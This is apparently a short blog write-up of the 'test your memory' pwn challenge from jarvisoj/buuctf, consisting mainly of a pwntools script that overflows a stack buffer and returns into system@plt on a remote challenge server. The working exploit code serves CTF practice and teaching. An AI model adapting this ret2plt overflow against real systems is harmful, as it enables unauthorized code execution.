jarvisoj_test_your_memory

我会带着你远行 2023-02-22 10:51

![Image][img1]

`I have finally finished all of the 1-point pwn challenges on the buuctf platform.... I thought everything after them would be heap challenges, but this one is clearly a stack challenge.....`

![Image][img2]

```python
from pwn import *

context.log_level = 'debug'
proc_name = './memory'

p = process(proc_name)                # local run; replaced by the remote connection below
p = remote('node3.buuoj.cn', 29878)   # remote challenge instance

elf = ELF(proc_name)
system_plt = elf.plt['system']        # PLT entry of system() in the binary
main_addr = elf.sym['main']           # used as the return address after system()

# 0x13 bytes of buffer + 4 bytes of saved ebp, then the overwritten return address,
# the return address for system(), and the argument passed to system()
payload = b'a' * (0x13 + 4) + p32(system_plt) + p32(main_addr) + p32(0x80487e0)

# p.recv()  # local and remote behave slightly differently; enable this line when running locally
p.sendline(payload)
p.recv()
p.recv()
```

![Image][img3]

[img1]: https://img-blog.csdnimg.cn/20200703003732143.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzgzMzY0Mg==,size_16,color_FFFFFF,t_70
[img2]: https://img-blog.csdnimg.cn/20200703004240351.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzgzMzY0Mg==,size_16,color_FFFFFF,t_70
[img3]: https://img-blog.csdnimg.cn/20200703010826476.png